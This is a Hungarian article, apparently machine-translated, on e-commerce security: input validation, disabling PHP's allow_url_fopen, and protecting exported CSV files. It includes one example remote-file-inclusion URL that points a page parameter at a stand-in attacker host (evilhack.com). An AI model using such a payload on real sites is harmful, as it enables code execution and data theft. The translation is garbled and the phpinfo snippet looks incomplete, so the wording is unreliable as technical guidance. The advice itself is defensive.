E-Commerce Biztonság - dugulás a biztonsági lyukak

Biztonság egy e-kereskedelmi webhely kell nagy figyelmet kidolgozása során az e-kereskedelmi webhely vagy szoftver. A fejlesztő tisztában kell lennie az összes biztonsági megfontolások a tervezés során a telephely. Az e-kereskedelem egyre gyakoribbá válik ezekben a napokban, a biztonsági támadások száma biztosan nő. Paranoia van egy egészséges dolog az e-kereskedelmi webhely fejlesztőknek, meg kell tartani a lépést a kapu biztonsági kérdéseket, és tartsa meg fülünket, és nyitva a szemét. Bár a következő komoly hiányosságok vannak, a következő kiskapuk ha jelen vannak könnyedén meg.

Alább felsorolt néhány biztonsági megfontolások során figyelembe vehető fejlesztő oldalon. Ez a cikk nem terjed ki az e-lopás, kérjük, az én külön cikket ezzel kapcsolatban.

Felhasználói - minden bemenet, függetlenül attól, hogy belépnek egy mennyiség, keres egy terméket, belépés egy nevet stb kell érvényesíteni a gyanús karakter. Ha ez nem történik meg, akkor lehet belépni "?>", záró zárócímkéket PHP és végre egy PHP kódot.

Sokkal biztonságosabb lehetővé számokat és karaktereket az (nyomtatott betűvel szerepel) és a 0-9, és semmi mást, ahelyett, hogy az összes karakter, hogy nem kell ott. Az érvényesítési parancsfájl kell lapozni minden karaktert egyenként. Ezt úgy kell megvalósítani használ szerver oldali validálás, nem Javascript. Használó szerver oldali beviteli ellenőrzés elengedhetetlen távol tartani a nem kívánt karakter

Létezik egy másik fontos végrehajtásakor a PHP kódot. Ha a PHP-beállítás van egy úgynevezett allow_url_fopen amely lehetővé teszi a fájlok megnyitása egy PHP szkriptet. Ez a beállítás meg kell szakítani, kivéve, ha feltétlenül szükséges.

Képzeljük csak el, sikerült a PHP szkripteket mind fix fejléc és lábléc, és hozzáférnek a weboldalak beírni a http://www.mysite.com/index.php?page=page2. Kész is van egy rosszindulatú felhasználó egyik szkript módosítja ezeket a paramétereket beírja a "http:// www.mysite.com/index.php?page=http://www.evilhack.com/hacker.txt"-val Néhány PHP kódot a fájlban "hacker.txt". Lehetne bármi megtörténhet, a PHP fájlokat olvasni, törölni, fontos információkat lopott.

Ha nem biztos benne, hogy ez a beállítás be-vagy kikapcsolása, másolja a következő PHP kódot egy szöveges fájlt, és töltse fel a webszervert:

phpinfo ();
?>

Ha a szkript elérheti a webszerverre, akkor találkozik a beállítást allow_url_fopen alatt alakzat.

A számítógép-felhasználó, normál körülmények között nem találja az értékét ezt a beállítást.

Legyen óvatos az exportált adatokat, mint a megrendelések, a termékek és a MySQL CSV fájlokat. Ha ez az adat abból a forgatókönyvet, és tartanak a webszerveren, egy közös, azaz a fájl nevét. http://www.mysite.com/admin/output_tables.csv. Ez csak akkor igazán probléma, amikor az exportált adatok lakik egy fájlt egy olyan könyvtárba, a nyilvánosság számára hozzáférhetővé. Van két lehetőség, hogy ezt a biztonsági joghézag - Először is a kimeneti fájl mögött egy jelszóval védett könyvtárba, másrészt hogy az adatok belül található egy HTML form textarea elem forgatókönyvet. A storeowner lehet majd másolja az adatokat a fájlból, és hozzon létre egy új fájlt a számítógépen és illessze be az információ itt.

Már kész is van egy hacker megtalálni a fájlnevet ellenőrzésével ki az e-kereskedelmi szoftver demo honlapján, és keresse meg ugyanazt a fájlnevet egy igazi oldalon.

Rate Article

Related Videos
Play Video How to Strengthen Network Security with Cisco Network Manager	Play Video Understanding your Home Network Router #5 - Secure Your Network with WPA2	Play Video Learn About Secure Computing	Play Video How to Keep Your Computer Secure	Play Video Hogyan viselkedni Ellenőriz biztonsági beállításai a Windows Vista

Alább felsorolt több cikk kapcsolódik a fenti cikk az "e-kereskedelmi" cikk kategóriában.

Iránt érdeklődők, a fenti cikkben az "E-Commerce Biztonság - dugulás a biztonsági lyukak" szintén érdeklődnek a kapcsolódó cikkek közül az alábbi: